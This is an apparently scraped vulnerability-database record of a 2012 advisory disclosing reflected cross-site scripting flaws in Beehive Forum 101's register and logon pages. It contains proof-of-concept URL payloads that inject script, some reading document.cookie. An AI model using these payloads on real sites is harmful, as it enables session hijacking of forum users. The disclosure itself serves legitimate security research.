Beehive Forum 101 Cross Site Scripting

2012-01-16T00:00:00

Description

{"id": "PACKETSTORM:108709", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Beehive Forum 101 Cross Site Scripting", "description": "", "published": "2012-01-16T00:00:00", "modified": "2012-01-16T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/108709/Beehive-Forum-101-Cross-Site-Scripting.html", "reporter": "Stefan Schurtz", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:22:39", "viewCount": 9, "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "sourceHref": "https://packetstormsecurity.com/files/download/108709/SSCHADV2011-042.txt", "sourceData": "`Advisory: Beehive Forum 101 Multiple XSS vulnerabilities \nAdvisory ID: SSCHADV2011-042 \nAuthor: Stefan Schurtz \nAffected Software: Successfully tested on Beehive Forum 101 \nVendor URL: http://www.beehiveforum.co.uk/ \nVendor Status: informed \n \n========================== \nVulnerability Description \n========================== \n \nBeehive Forum 101 is prone to multiple XSS vulnerabilities \n \n================== \nPoC-Exploit \n================== \n \n// XSS \nhttp://[target]/forum/register.php?'\"</script><script>alert('XSS')</script> \nhttp://[target]/forum/register.php/'\"</script><script>alert(document.cookie)</script> \nhttp://[target]/forum/logon.php?'\"</script><script>alert('XSS')</script> \nhttp://[target]/forum/logon.php/'\"</script><script>alert(document.cookie)</script> \n \n========= \nSolution \n========= \n \n- \n \n==================== \nDisclosure Timeline \n==================== \n \n26-Dec-2011 - vendor informed \n29-Dec-2011 - vendor feedback \n15-Jan-2011 - no patch available \n \n======== \nCredits \n======== \n \nVulnerabilities found and advisory written by Stefan Schurtz. \n \n=========== \nReferences \n=========== \n \nhttp://www.darksecurity.de/advisories/SSCHADV2011-042.txt \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645334932, "score": 1659770509}}